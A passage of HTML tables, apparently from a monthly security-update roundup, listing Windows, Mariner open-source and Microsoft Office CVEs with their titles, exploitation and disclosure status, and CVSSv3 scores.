undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58737"><span style='font-size: undefined;'>CVE-2025-58737</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Remote Desktop Protocol Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59282"><span style='font-size: undefined;'>CVE-2025-59282</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Internet Information Services (IIS) Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58732"><span style='font-size: undefined;'>CVE-2025-58732</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58735"><span style='font-size: undefined;'>CVE-2025-58735</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58730"><span style='font-size: undefined;'>CVE-2025-58730</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58733"><span style='font-size: undefined;'>CVE-2025-58733</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58736"><span style='font-size: undefined;'>CVE-2025-58736</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55678"><span style='font-size: undefined;'>CVE-2025-55678</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>DirectX Graphics Kernel Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55700"><span style='font-size: undefined;'>CVE-2025-55700</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58717"><span style='font-size: undefined;'>CVE-2025-58717</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59259"><span style='font-size: undefined;'>CVE-2025-59259</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Local Session Manager (LSM) Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58729"><span style='font-size: undefined;'>CVE-2025-58729</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Local Session Manager (LSM) Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59185"><span style='font-size: undefined;'>CVE-2025-59185</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>NTLM Hash Disclosure Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59244"><span style='font-size: undefined;'>CVE-2025-59244</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>NTLM Hash Disclosure Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58739"><span style='font-size: undefined;'>CVE-2025-58739</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Windows File Explorer Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59214"><span style='font-size: undefined;'>CVE-2025-59214</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Windows File Explorer Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59258"><span style='font-size: undefined;'>CVE-2025-59258</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Active Directory Federation Services (ADFS) Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.2</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55695"><span style='font-size: undefined;'>CVE-2025-55695</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows WLAN AutoConfig Service Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59190"><span style='font-size: undefined;'>CVE-2025-59190</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Search Service Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59253"><span style='font-size: undefined;'>CVE-2025-59253</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Search Service Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59211"><span style='font-size: undefined;'>CVE-2025-59211</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Push Notification Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59209"><span style='font-size: undefined;'>CVE-2025-59209</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Push Notification Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59188"><span style='font-size: undefined;'>CVE-2025-59188</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Failover Cluster Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59198"><span style='font-size: undefined;'>CVE-2025-59198</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Search Service Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47827"><span style='font-size: undefined;'>CVE-2025-47827</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>MITRE CVE-2025-47827: Secure Boot bypass in IGEL OS before 11</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Yes</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.6</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-9535"><span style='font-size: undefined;'>CVE-2016-9535</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>MITRE CVE-2016-9535: LibTIFF Heap Buffer Overflow Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59280"><span style='font-size: undefined;'>CVE-2025-59280</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows SMB Client Tampering Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>3.1</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>Mariner Open Source Software vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:9.134615384615383%"/><col style="width:51.76282051282052%"/><col style="width:13.782051282051283%"/><col style="width:13.62179487179487%"/><col style="width:11.698717948717949%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-49844"><span style='font-size: undefined;'>CVE-2025-49844</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Redis Lua Use-After-Free may lead to remote code execution</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.9</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-10729"><span style='font-size: undefined;'>CVE-2025-10729</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Use-after-free vulnerability in Qt SVG qsvghandler.cpp allows denial of service via crafted SVG</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-11234"><span style='font-size: undefined;'>CVE-2025-11234</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Qemu-kvm: vnc websocket handshake use-after-free</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-46817"><span style='font-size: undefined;'>CVE-2025-46817</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Lua library commands may lead to integer overflow and potential RCE</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-46819"><span style='font-size: undefined;'>CVE-2025-46819</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Redis is vulnerable to DoS via specially crafted LUA scripts</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-46818"><span style='font-size: undefined;'>CVE-2025-46818</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Redis: Authenticated users can execute LUA scripts as a different user</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-61985"><span style='font-size: undefined;'>CVE-2025-61985</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ssh in OpenSSH before 10.1 allows the '\0' character in an ssh:// URI, potentially leading to code execution when a ProxyCommand is used.</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-8291"><span style='font-size: undefined;'>CVE-2025-8291</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ZIP64 End of Central Directory (EOCD) Locator record offset not checked</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-61984"><span style='font-size: undefined;'>CVE-2025-61984</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ssh in OpenSSH before 10.1 allows control characters in usernames that originate from certain possibly untrusted sources, potentially leading to code execution when a ProxyCommand is used. The untrusted sources are the command line and %-sequence expansion of a configuration file. (A configuration file that provides a complete literal username is not categorized as an untrusted source.)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>3.6</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-11414"><span style='font-size: undefined;'>CVE-2025-11414</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>GNU Binutils Linker elflink.c get_link_hash_entry out-of-bounds</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>3.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-11413"><span style='font-size: undefined;'>CVE-2025-11413</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>GNU Binutils Linker elflink.c elf_link_add_object_symbols out-of-bounds</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>3.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-11412"><span style='font-size: undefined;'>CVE-2025-11412</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>GNU Binutils Linker elflink.c bfd_elf_gc_record_vtentry out-of-bounds</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>3.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-11495"><span style='font-size: undefined;'>CVE-2025-11495</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>GNU Binutils Linker elf64-x86-64.c elf_x86_64_relocate_section heap-based overflow</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>3.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-10728"><span style='font-size: undefined;'>CVE-2025-10728</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Uncontrolled recursion in Qt SVG module</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>Microsoft Office vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:14.102564102564102%"/><col style="width:38.141025641025635%"/><col style="width:13.782051282051283%"/><col style="width:17.467948717948715%"/><col style="width:16.506410256410255%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59228"><span style='font-size: undefined;'>CVE-2025-59228</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft SharePoint Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59237"><span style='font-size: undefined;'>CVE-2025-59237</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft SharePoint Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59236"><span style='font-size: undefined;'>CVE-2025-59236</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59222"><span style='font-size: undefined;'>CVE-2025-59222</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Word Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59238"><span style='font-size: undefined;'>CVE-2025-59238</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft PowerPoint Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59226"><span style='font-size: undefined;'>CVE-2025-59226</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Office Visio Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59234"><span style='font-size: undefined;'>CVE-2025-59234</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Office Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59227"><span style='font-size: undefined;'>CVE-2025-59227</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Office Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59231"><span style='font-size: undefined;'>CVE-2025-59231</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59233"><span style='font-size: undefined;'>CVE-2025-59233</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59243"><span style='font-size: undefined;'>CVE-2025-59243</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59223"><span style='font-size: undefined;'>CVE-2025-59223</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a 